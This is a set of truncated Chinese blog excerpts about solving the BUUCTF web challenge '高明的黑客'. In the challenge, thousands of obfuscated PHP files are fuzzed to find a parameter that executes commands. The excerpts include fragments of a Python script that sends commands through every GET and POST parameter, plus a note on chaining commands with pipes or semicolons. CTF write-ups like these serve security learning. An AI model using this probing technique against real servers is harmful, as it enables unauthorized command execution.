http://63e1a96d-8153-41cc-bd10-2fe12e5ce3ef.node3.buuoj.cn/www.tar.gz 解压下来发现大量的PHP文件,猜测会不会有木马可以利用,尝试搜索一下关键字发现了 继续搜索 但是不知道那些是可以被利用的,搜出来的结果又很多,查了一下WP才知道这道题考的是fuzzing,找了一篇爆破脚本但是菜鸡不是很理解,于是在这...
buuctf—web—高明的黑客 打开靶机,看到如下界面 于是打开www.tar.gz 下载后发现是一个放有大量php文件的文件夹 看了大佬的wp后明白了是fuzzing 附上大佬的脚本 importosimportreimportrequestsfilenames= os.listdir('D:/phpStudy/PHPTutorial/WWW/src/')pattern= re.compile(r"\$_[GEPOST]{3,4}\[.*\]...
'+pdget+cmd#print(urlg)res=r.get(urlg)print('---> '+pdget)if'cryscat'inres.text:print('Success!!! ---> '+urlg)flag=1breakif'POST'inj:pdpost=re.findall(r"'(.*)'",j)[0]data={pdpost:cmd}urlp=url+i#print(urlp)res=r.post(urlp,data=data)print('---> '+pdpost)if...
知识点: 类似题型:https://www.cnblogs.com/SpouseLJ/p/13223953.html 命令知识点:https://www.cnblogs.com/SpouseLJ/p/13223967.html 命令执行的方法大抵是加上管道符或者分号 解题思路: 本题很简单什么都没有
代码审计和动态测试——BUUCTF - 高明的黑客 根据题目提示,访问http://2ea746a2-0ecd-449b-896b-e0fb38956134.node1.buuoj.cn/www.tar.gz下载源码 解压之后发现有3002个php文件,而且大部分文件都是垃圾代码,解读不了。 观察之后发现存在_GET 和 _POST,于是通过脚本进行批量扫描,通过加入echo之类的代码,只要...